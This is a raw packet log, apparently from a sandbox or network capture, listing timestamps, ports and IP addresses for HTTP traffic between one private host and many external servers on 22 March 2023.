Mar 22, 2023 05:43:29.666678905 CET	80	49823	46.242.238.60	192.168.2.5
Mar 22, 2023 05:43:29.666795969 CET	49823	80	192.168.2.5	46.242.238.60
Mar 22, 2023 05:43:29.683677912 CET	80	49813	60.43.154.138	192.168.2.5
Mar 22, 2023 05:43:29.683769941 CET	49813	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:29.685333014 CET	80	49814	202.254.236.40	192.168.2.5
Mar 22, 2023 05:43:29.685420990 CET	49814	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:29.687386036 CET	80	49822	69.163.239.62	192.168.2.5
Mar 22, 2023 05:43:29.687489986 CET	49822	80	192.168.2.5	69.163.239.62
Mar 22, 2023 05:43:29.739763975 CET	49822	80	192.168.2.5	69.163.239.62
Mar 22, 2023 05:43:29.777621984 CET	80	49825	108.167.164.216	192.168.2.5
Mar 22, 2023 05:43:29.777750969 CET	49825	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:29.790246010 CET	80	49810	81.2.194.241	192.168.2.5
Mar 22, 2023 05:43:29.790313959 CET	49810	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:29.822068930 CET	49825	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:29.911389112 CET	80	49822	69.163.239.62	192.168.2.5
Mar 22, 2023 05:43:29.911561966 CET	80	49822	69.163.239.62	192.168.2.5
Mar 22, 2023 05:43:29.911624908 CET	49822	80	192.168.2.5	69.163.239.62
Mar 22, 2023 05:43:29.934767962 CET	49826	80	192.168.2.5	51.79.51.72
Mar 22, 2023 05:43:29.934801102 CET	80	49824	211.1.226.67	192.168.2.5
Mar 22, 2023 05:43:29.934881926 CET	49824	80	192.168.2.5	211.1.226.67
Mar 22, 2023 05:43:29.935597897 CET	49824	80	192.168.2.5	211.1.226.67
Mar 22, 2023 05:43:29.936417103 CET	49822	80	192.168.2.5	69.163.239.62
Mar 22, 2023 05:43:29.950349092 CET	80	49825	108.167.164.216	192.168.2.5
Mar 22, 2023 05:43:29.957746029 CET	80	49825	108.167.164.216	192.168.2.5
Mar 22, 2023 05:43:29.957840919 CET	49825	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:30.008145094 CET	49825	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:30.014225006 CET	80	49807	135.181.73.98	192.168.2.5
Mar 22, 2023 05:43:30.014293909 CET	49807	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:30.023577929 CET	49772	80	192.168.2.5	210.140.73.39
Mar 22, 2023 05:43:30.038264990 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.038307905 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.038331032 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.038352013 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.038372993 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.038372993 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.038420916 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.038430929 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.038430929 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.038445950 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.038485050 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.038486004 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.038506031 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.038510084 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.038530111 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.038552046 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.038552046 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.038570881 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.038573980 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.038588047 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.038592100 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.038613081 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.038640022 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.038659096 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.040127039 CET	49827	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:30.041388988 CET	80	49826	51.79.51.72	192.168.2.5
Mar 22, 2023 05:43:30.041490078 CET	49826	80	192.168.2.5	51.79.51.72
Mar 22, 2023 05:43:30.041872978 CET	49826	80	192.168.2.5	51.79.51.72
Mar 22, 2023 05:43:30.107795000 CET	80	49822	69.163.239.62	192.168.2.5
Mar 22, 2023 05:43:30.108165026 CET	80	49822	69.163.239.62	192.168.2.5
Mar 22, 2023 05:43:30.108280897 CET	49822	80	192.168.2.5	69.163.239.62
Mar 22, 2023 05:43:30.144371033 CET	80	49825	108.167.164.216	192.168.2.5
Mar 22, 2023 05:43:30.144489050 CET	49825	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:30.148364067 CET	80	49826	51.79.51.72	192.168.2.5
Mar 22, 2023 05:43:30.148433924 CET	80	49826	51.79.51.72	192.168.2.5
Mar 22, 2023 05:43:30.148509979 CET	49826	80	192.168.2.5	51.79.51.72
Mar 22, 2023 05:43:30.149353981 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.149377108 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.149394035 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.149539948 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.149595976 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.149604082 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.149627924 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.149648905 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.149657011 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.149678946 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.149696112 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.150337934 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.150358915 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.150413990 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.150413990 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.150818110 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.150845051 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.150862932 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.150883913 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.150885105 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.150923014 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.151300907 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.151324034 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.151345968 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.151365995 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.151365995 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.151407957 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.151971102 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.152013063 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.152030945 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.152071953 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.152110100 CET	80	49766	103.3.1.161	192.168.2.5
Mar 22, 2023 05:43:30.152225018 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.152795076 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.152816057 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.152844906 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.152856112 CET	49766	80	192.168.2.5	103.3.1.161
Mar 22, 2023 05:43:30.152862072 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.152896881 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.153634071 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.153656006 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.153676033 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.153692961 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.153733015 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.155141115 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.155162096 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.155215979 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.155252934 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.159969091 CET	49826	80	192.168.2.5	51.79.51.72
Mar 22, 2023 05:43:30.161587954 CET	80	49827	96.127.180.42	192.168.2.5
Mar 22, 2023 05:43:30.161676884 CET	49827	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:30.225543976 CET	80	49824	211.1.226.67	192.168.2.5
Mar 22, 2023 05:43:30.226196051 CET	80	49824	211.1.226.67	192.168.2.5
Mar 22, 2023 05:43:30.226443052 CET	49824	80	192.168.2.5	211.1.226.67
Mar 22, 2023 05:43:30.246994019 CET	49827	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:30.260785103 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:30.264560938 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.264581919 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.264658928 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.264686108 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.264714003 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.264754057 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.264755011 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.264872074 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.265389919 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.265418053 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.265441895 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.265559912 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.265584946 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.266078949 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.266108036 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.266134977 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.266163111 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.266163111 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.266191006 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.266604900 CET	80	49826	51.79.51.72	192.168.2.5
Mar 22, 2023 05:43:30.266773939 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.266818047 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.266845942 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.266948938 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.266948938 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.267669916 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.267697096 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.267721891 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.267827034 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.267858982 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.268304110 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.268332005 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.268378019 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.268379927 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.268405914 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.268428087 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.269435883 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.269464016 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.269491911 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.269512892 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.269539118 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.269539118 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.270158052 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.270184994 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.270211935 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.270312071 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.270329952 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.270576000 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.270603895 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.270631075 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.270643950 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.270673037 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.270683050 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.271334887 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.271363974 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.271389961 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.271495104 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.271495104 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.272094965 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.272123098 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.272147894 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.272252083 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.272289038 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.272835016 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.272861958 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.272888899 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.272990942 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.273025036 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.273624897 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.273653030 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.273680925 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.273832083 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.273833036 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.274404049 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.274430990 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.274458885 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.274497986 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.274497986 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.274532080 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.275114059 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.275134087 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.275151968 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.275196075 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.278135061 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.283845901 CET	49824	80	192.168.2.5	211.1.226.67
Mar 22, 2023 05:43:30.368604898 CET	80	49827	96.127.180.42	192.168.2.5
Mar 22, 2023 05:43:30.370397091 CET	80	49827	96.127.180.42	192.168.2.5
Mar 22, 2023 05:43:30.370495081 CET	49827	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:30.379698992 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.379878044 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.379893064 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.379904985 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.379930019 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.379930973 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.379977942 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.379977942 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.380763054 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.380789042 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.380812883 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.380836010 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.380901098 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.380901098 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.381264925 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.381309986 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.381333113 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.381331921 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.381391048 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.382014990 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.382040024 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.382062912 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.382069111 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.382107019 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.382107019 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.382797956 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.382823944 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.382848978 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.382853031 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.382893085 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.382913113 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.383506060 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.383533001 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.383558989 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.383567095 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.383610964 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.383610964 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.384223938 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.384249926 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.384274960 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.384287119 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.384332895 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.384332895 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.384991884 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.385019064 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.385060072 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.385071993 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.385071993 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.385118961 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.385739088 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.385773897 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.385806084 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.385807991 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.385833979 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.385864019 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.386487961 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.386516094 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:30.386554003 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.386594057 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:30.476717949 CET	49776	80	192.168.2.5	96.91.204.114
Mar 22, 2023 05:43:30.489213943 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:30.489332914 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:30.538192034 CET	49827	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:30.538763046 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:30.557635069 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:30.557748079 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:30.573842049 CET	80	49824	211.1.226.67	192.168.2.5
Mar 22, 2023 05:43:30.573952913 CET	49824	80	192.168.2.5	211.1.226.67
Mar 22, 2023 05:43:30.587151051 CET	49829	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:30.594794989 CET	49830	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:30.620801926 CET	49831	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:30.631164074 CET	80	49830	77.68.50.105	192.168.2.5
Mar 22, 2023 05:43:30.631331921 CET	49830	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:30.631699085 CET	49830	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:30.661449909 CET	80	49827	96.127.180.42	192.168.2.5
Mar 22, 2023 05:43:30.661546946 CET	49827	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:30.668097019 CET	80	49830	77.68.50.105	192.168.2.5
Mar 22, 2023 05:43:30.668127060 CET	80	49830	77.68.50.105	192.168.2.5
Mar 22, 2023 05:43:30.668190956 CET	49830	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:30.682049036 CET	49832	80	192.168.2.5	217.19.237.54
Mar 22, 2023 05:43:30.710921049 CET	80	49832	217.19.237.54	192.168.2.5
Mar 22, 2023 05:43:30.711257935 CET	49832	80	192.168.2.5	217.19.237.54
Mar 22, 2023 05:43:30.717663050 CET	49833	80	192.168.2.5	72.44.93.236
Mar 22, 2023 05:43:30.736687899 CET	80	49829	52.86.6.113	192.168.2.5
Mar 22, 2023 05:43:30.736816883 CET	49829	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:30.767817020 CET	49829	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:30.768625021 CET	49832	80	192.168.2.5	217.19.237.54
Mar 22, 2023 05:43:30.792304039 CET	80	49831	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:30.792391062 CET	49831	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:30.797418118 CET	80	49832	217.19.237.54	192.168.2.5
Mar 22, 2023 05:43:30.798623085 CET	80	49832	217.19.237.54	192.168.2.5
Mar 22, 2023 05:43:30.798723936 CET	49832	80	192.168.2.5	217.19.237.54
Mar 22, 2023 05:43:30.809369087 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:30.821261883 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:30.843800068 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:30.843929052 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:30.844326973 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:30.849997044 CET	80	49833	72.44.93.236	192.168.2.5
Mar 22, 2023 05:43:30.850730896 CET	49833	80	192.168.2.5	72.44.93.236
Mar 22, 2023 05:43:30.865586042 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:30.869869947 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:30.869914055 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:30.869983912 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:30.869983912 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:30.870016098 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:30.870023012 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:30.870074034 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:30.870074034 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:30.923352957 CET	80	49829	52.86.6.113	192.168.2.5
Mar 22, 2023 05:43:30.923396111 CET	80	49829	52.86.6.113	192.168.2.5
Mar 22, 2023 05:43:30.923474073 CET	49829	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:30.958508015 CET	49829	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:31.017157078 CET	49831	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:31.017450094 CET	49833	80	192.168.2.5	72.44.93.236
Mar 22, 2023 05:43:31.018584967 CET	49830	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:31.019040108 CET	49835	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:31.054894924 CET	80	49830	77.68.50.105	192.168.2.5
Mar 22, 2023 05:43:31.054918051 CET	80	49830	77.68.50.105	192.168.2.5
Mar 22, 2023 05:43:31.055398941 CET	49830	80	192.168.2.5	77.68.50.105
Mar 22, 2023 05:43:31.062741041 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.062762976 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.062783003 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.062803984 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.062843084 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.062863111 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.062881947 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.062901020 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.062926054 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.062984943 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.062984943 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.107263088 CET	80	49829	52.86.6.113	192.168.2.5
